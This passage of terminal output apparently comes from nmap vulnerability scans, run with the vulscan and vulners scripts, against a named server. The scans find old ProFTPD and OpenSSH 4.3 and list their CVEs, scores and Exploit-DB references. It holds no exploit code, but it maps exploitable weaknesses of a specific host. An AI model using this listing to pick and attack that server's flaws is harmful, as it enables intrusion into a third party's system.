  2039. | [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
  2040. | [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
  2041. | [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
  2042. | [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
  2043. | [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
  2044. | [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
  2045. | [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
  2046. | [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
  2047. | [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
  2048. | [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
  2049. | [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
  2050. | [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
  2051. | [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
  2052. | [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
  2053. | [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
  2054. | [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
  2055. | [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
  2056. | [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
  2057. |
  2058. | SecurityFocus - https://www.securityfocus.com/bid/:
  2059. | [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  2060. |
  2061. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  2062. | [80980] ProFTPD FTP commands symlink
  2063. | [71226] ProFTPD pool code execution
  2064. | [65207] ProFTPD mod_sftp module denial of service
  2065. | [64495] ProFTPD sql_prepare_where() buffer overflow
  2066. | [63658] ProFTPD FTP server backdoor
  2067. | [63407] mod_sql module for ProFTPD buffer overflow
  2068. | [63155] ProFTPD pr_data_xfer denial of service
  2069. | [62909] ProFTPD mod_site_misc directory traversal
  2070. | [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
  2071. | [53936] ProFTPD mod_tls SSL certificate security bypass
  2072. | [48951] ProFTPD mod_sql username percent SQL injection
  2073. | [48558] ProFTPD NLS support SQL injection protection bypass
  2074. | [45274] ProFTPD URL cross-site request forgery
  2075. | [33733] ProFTPD Auth API security bypass
  2076. | [31461] ProFTPD mod_radius buffer overflow
  2077. | [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
  2078. | [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
  2079. | [30147] ProFTPD sreplace() buffer overflow
  2080. | [21530] ProFTPD mod_sql format string attack
  2081. | [21528] ProFTPD shutdown message format string attack
  2082. | [19410] GProFTPD file name format string attack
  2083. | [18453] ProFTPD SITE CHGRP command allows group ownership modification
  2084. | [17724] ProFTPD could allow an attacker to obtain valid accounts
  2085. | [16038] ProFTPD CIDR entry ACL bypass
  2086. | [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
  2087. | [12369] ProFTPD mod_sql SQL injection
  2088. | [12200] ProFTPD ASCII file newline buffer overflow
  2089. | [10932] ProFTPD long PASS command buffer overflow
  2090. | [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
  2091. | [7818] ProFTPD ls &quot
  2092. | [7816] ProFTPD file globbing denial of service
  2093. | [7126] ProFTPD fails to resolve hostnames
  2094. | [6433] ProFTPD format string
  2095. | [6209] proFTPD /var symlink
  2096. | [6208] ProFTPD contains configuration error in postinst script when running as root
  2097. | [5801] proftpd memory leak when using SIZE or USER commands
  2098. | [5737] ProFTPD system using mod_sqlpw unauthorized access
  2099. |
  2100. | Exploit-DB - https://www.exploit-db.com:
  2101. | [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
  2102. | [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
  2103. | [15662] ProFTPD 1.3.3c compromised source remote root Trojan
  2104. | [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
  2105. | [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
  2106. | [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
  2107. | [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
  2108. | [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
  2109. | [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
  2110. | [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
  2111. | [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
  2112. |
  2113. | OpenVAS (Nessus) - http://www.openvas.org:
  2114. | [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  2115. | [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
  2116. |
  2117. | SecurityTracker - https://www.securitytracker.com:
  2118. | [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
  2119. | [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
  2120. | [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
  2121. | [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
  2122. | [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
  2123. | [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
  2124. | [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
  2125. | [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
  2126. | [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
  2127. | [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
  2128. | [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
  2129. | [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
  2130. | [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
  2131. | [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
  2132. |
  2133. | OSVDB - http://www.osvdb.org:
  2134. | [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
  2135. | [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
  2136. | [70868] ProFTPD mod_sftp Component SSH Payload DoS
  2137. | [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
  2138. | [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
  2139. | [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
  2140. | [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
  2141. | [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
  2142. | [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
  2143. | [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
  2144. | [57310] ProFTPD Multiple Unspecified Overflows
  2145. | [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
  2146. | [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
  2147. | [57307] ProFTPD Multiple Modules Unspecified Overflows
  2148. | [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
  2149. | [57305] ProFTPD src/main.c Unspecified Overflow
  2150. | [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
  2151. | [57303] ProFTPD modules/mod_auth.c Unspecified Issue
  2152. | [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
  2153. | [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
  2154. | [51849] ProFTPD Character Encoding SQL Injection
  2155. | [51720] ProFTPD NLST Command Argument Handling Remote Overflow
  2156. | [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
  2157. | [48411] ProFTPD FTP Command Truncation CSRF
  2158. | [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
  2159. | [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
  2160. | [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
  2161. | [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
  2162. | [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
  2163. | [23063] ProFTPD mod_radius Password Overflow DoS
  2164. | [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
  2165. | [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
  2166. | [18270] ProFTPD ftpshut Shutdown Message Format String
  2167. | [14012] GProftpd gprostats Utility Log Parser Remote Format String
  2168. | [10769] ProFTPD File Transfer Newline Character Overflow
  2169. | [10768] ProFTPD STAT Command Remote DoS
  2170. | [10758] ProFTPD Login Timing Account Name Enumeration
  2171. | [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
  2172. | [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
  2173. | [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
  2174. | [7166] ProFTPD SIZE Command Memory Leak Remote DoS
  2175. | [7165] ProFTPD USER Command Memory Leak DoS
  2176. | [5744] ProFTPD CIDR IP Subnet ACL Bypass
  2177. | [5705] ProFTPD Malformed cwd Command Format String
  2178. | [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
  2179. | [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
  2180. | [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
  2181. |_
  2182. Service Info: OS: Unix
  2183.  
  2184. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2185. Nmap done: 1 IP address (1 host up) scanned in 10.51 seconds
  2186.  
  2187.  
  2188. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners,vulscan --script-args vulscandb -sV -p22 184.154.192.250
  2189. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:30 CST
  2190. Nmap scan report for server.etours.cn (184.154.192.250)
  2191. Host is up (0.037s latency).
  2192.  
  2193. PORT STATE SERVICE VERSION
  2194. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  2195. | vulners:
  2196. | cpe:/a:openbsd:openssh:4.3:
  2197. | CVE-2006-5051 9.3 https://vulners.com/cve/CVE-2006-5051
  2198. | CVE-2006-4924 7.8 https://vulners.com/cve/CVE-2006-4924
  2199. | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
  2200. | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
  2201. | CVE-2007-4752 7.5 https://vulners.com/cve/CVE-2007-4752
  2202. | CVE-2009-2904 6.9 https://vulners.com/cve/CVE-2009-2904
  2203. | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
  2204. | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
  2205. | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
  2206. | CVE-2008-4109 5.0 https://vulners.com/cve/CVE-2008-4109
  2207. | CVE-2007-2243 5.0 https://vulners.com/cve/CVE-2007-2243
  2208. | CVE-2006-5052 5.0 https://vulners.com/cve/CVE-2006-5052
  2209. | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
  2210. | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
  2211. | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
  2212. | CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
  2213. |_ CVE-2008-3259 1.2 https://vulners.com/cve/CVE-2008-3259
  2214. | vulscan: VulDB - https://vuldb.com:
  2215. | [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
  2216. | [39331] OpenSSH 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
  2217. | [43307] OpenSSH 4.0 unknown vulnerability
  2218. | [41835] OpenSSH up to 4.8 unknown vulnerability
  2219. | [38743] OpenSSH up to 4.6 unknown vulnerability
  2220. | [36382] OpenBSD OpenSSH up to 4.6 information disclosure
  2221. | [32699] OpenBSD OpenSSH 4.1 denial of service
  2222. | [2667] OpenBSD OpenSSH 4.4 Separation Monitor unknown vulnerability
  2223. |
  2224. | MITRE CVE - https://cve.mitre.org:
  2225. | [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
  2226. | [CVE-2008-4109] A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch
  2227. | [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
  2228. | [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
  2229. | [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
  2230. | [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
  2231. | [CVE-2008-3234] sshd in OpenSSH 4 on Debian GNU/Linux, and the 20070303 OpenSSH snapshot, allows remote authenticated users to obtain access to arbitrary SELinux roles by appending a :/ (colon slash) sequence, followed by the role name, to the username.
  2232. | [CVE-2008-1657] OpenSSH 4.4 up to versions before 4.9 allows remote authenticated users to bypass the sshd_config ForceCommand directive by modifying the .ssh/rc session file.
  2233. | [CVE-2007-6415] scponly 4.6 and earlier allows remote authenticated users to bypass intended restrictions and execute arbitrary code by invoking scp, as implemented by OpenSSH, with the -F and -o options.
  2234. | [CVE-2007-4752] ssh in OpenSSH before 4.7 does not properly handle when an untrusted cookie cannot be created and uses a trusted X11 cookie instead, which allows attackers to violate intended policy and gain privileges by causing an X client to be treated as trusted.
  2235. | [CVE-2007-2243] OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which displays a different response if the user account exists, a similar issue to CVE-2001-1483.
  2236. | [CVE-2006-5794] Unspecified vulnerability in the sshd Privilege Separation Monitor in OpenSSH before 4.5 causes weaker verification that authentication has been successful, which might allow attackers to bypass authentication. NOTE: as of 20061108, it is believed that this issue is only exploitable by leveraging vulnerabilities in the unprivileged process, which are not known to exist.
  2237. | [CVE-2006-5229] OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, and possibly under limited configurations, allows remote attackers to determine valid usernames via timing discrepancies in which responses take longer for valid usernames than invalid ones, as demonstrated by sshtime. NOTE: as of 20061014, it appears that this issue is dependent on the use of manually-set passwords that causes delays when processing /etc/shadow due to an increased number of rounds.
  2238. | [CVE-2006-5052] Unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."
  2239. | [CVE-2006-5051] Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.
  2240. | [CVE-2006-4924] sshd in OpenSSH before 4.4, when using the version 1 SSH protocol, allows remote attackers to cause a denial of service (CPU consumption) via an SSH packet that contains duplicate blocks, which is not properly handled by the CRC compensation attack detector.
  2241. | [CVE-2006-0225] scp in OpenSSH 4.2p1 allows attackers to execute arbitrary commands via filenames that contain shell metacharacters or spaces, which are expanded twice.
  2242. | [CVE-2005-2798] sshd in OpenSSH before 4.2, when GSSAPIDelegateCredentials is enabled, allows GSSAPI credentials to be delegated to clients who log in using non-GSSAPI methods, which could cause those credentials to be exposed to untrusted users or hosts.
  2243. | [CVE-2005-2797] OpenSSH 4.0, and other versions before 4.2, does not properly handle dynamic port forwarding ("-D" option) when a listen address is not provided, which may cause OpenSSH to enable the GatewayPorts functionality.
  2244. | [CVE-2005-2666] SSH, as implemented in OpenSSH before 4.0 and possibly other implementations, stores hostnames, IP addresses, and keys in plaintext in the known_hosts file, which makes it easier for an attacker that has compromised an SSH user's account to generate a list of additional targets that are more likely to have the same password or key.
  2245. | [CVE-2001-1029] libutil in OpenSSH on FreeBSD 4.4 and earlier does not drop privileges before verifying the capabilities for reading the copyright and welcome files, which allows local users to bypass the capabilities checks and read arbitrary files by specifying alternate copyright or welcome files.
  2246. |
  2247. | SecurityFocus - https://www.securityfocus.com/bid/:
  2248. | [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  2249. |
  2250. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  2251. | [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
  2252. |
  2253. | Exploit-DB - https://www.exploit-db.com:
  2254. | [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
  2255. | [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  2256. | [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
  2257. |
  2258. | OpenVAS (Nessus) - http://www.openvas.org:
  2259. | [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
  2260. | [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
  2261. | [881183] CentOS Update for openssh CESA-2012:0884 centos6
  2262. | [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
  2263. | [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
  2264. | [870763] RedHat Update for openssh RHSA-2012:0884-04
  2265. | [870129] RedHat Update for openssh RHSA-2008:0855-01
  2266. | [861813] Fedora Update for openssh FEDORA-2010-5429
  2267. | [861319] Fedora Update for openssh FEDORA-2007-395
  2268. | [861170] Fedora Update for openssh FEDORA-2007-394
  2269. | [861012] Fedora Update for openssh FEDORA-2007-715
  2270. | [840345] Ubuntu Update for openssh vulnerability USN-597-1
  2271. | [840300] Ubuntu Update for openssh update USN-612-5
  2272. | [840271] Ubuntu Update for openssh vulnerability USN-612-2
  2273. | [840268] Ubuntu Update for openssh update USN-612-7
  2274. | [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
  2275. | [840214] Ubuntu Update for openssh vulnerability USN-566-1
  2276. | [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
  2277. | [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
  2278. | [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
  2279. | [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
  2280. | [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
  2281. | [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
  2282. | [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
  2283. | [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
  2284. | [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
  2285. | [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
  2286. | [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
  2287. | [100584] OpenSSH X Connections Session Hijacking Vulnerability
  2288. | [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
  2289. | [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
  2290. | [65987] SLES10: Security update for OpenSSH
  2291. | [65819] SLES10: Security update for OpenSSH
  2292. | [65514] SLES9: Security update for OpenSSH
  2293. | [65513] SLES9: Security update for OpenSSH
  2294. | [65334] SLES9: Security update for OpenSSH
  2295. | [65248] SLES9: Security update for OpenSSH
  2296. | [65218] SLES9: Security update for OpenSSH
  2297. | [65169] SLES9: Security update for openssh,openssh-askpass
  2298. | [65126] SLES9: Security update for OpenSSH
  2299. | [65019] SLES9: Security update for OpenSSH
  2300. | [65015] SLES9: Security update for OpenSSH
  2301. | [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
  2302. | [61639] Debian Security Advisory DSA 1638-1 (openssh)
  2303. | [61030] Debian Security Advisory DSA 1576-2 (openssh)
  2304. | [61029] Debian Security Advisory DSA 1576-1 (openssh)
  2305. | [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
  2306. | [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
  2307. | [60667] Slackware Advisory SSA:2008-095-01 openssh
  2308. | [59014] Slackware Advisory SSA:2007-255-01 openssh
  2309. | [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
  2310. | [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
  2311. | [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
  2312. | [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
  2313. | [57492] Slackware Advisory SSA:2006-272-02 openssh
  2314. | [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
  2315. | [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
  2316. | [57470] FreeBSD Ports: openssh
  2317. | [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
  2318. | [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
  2319. | [56294] Slackware Advisory SSA:2006-045-06 openssh
  2320. | [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
  2321. | [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
  2322. | [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
  2323. | [53788] Debian Security Advisory DSA 025-1 (openssh)
  2324. | [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
  2325. | [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
  2326. | [11343] OpenSSH Client Unauthorized Remote Forwarding
  2327. | [10954] OpenSSH AFS/Kerberos ticket/token passing
  2328. | [10883] OpenSSH Channel Code Off by 1
  2329. | [10823] OpenSSH UseLogin Environment Variables
  2330. |
  2331. | SecurityTracker - https://www.securitytracker.com:
  2332. | [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
  2333. | [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
  2334. | [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
  2335. | [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
  2336. | [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
  2337. | [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
  2338. | [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
  2339. | [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
  2340. | [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
  2341. | [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
  2342. | [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
  2343. | [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
  2344. | [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
  2345. | [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
  2346. | [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
  2347. | [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
  2348. | [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
  2349. | [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
  2350. | [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
  2351. | [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
  2352. | [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
  2353. | [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
  2354. | [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
  2355. | [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
  2356. | [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
  2357. | [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
  2358. | [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
  2359. | [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
  2360. | [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
  2361. | [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
  2362. | [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
  2363. | [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
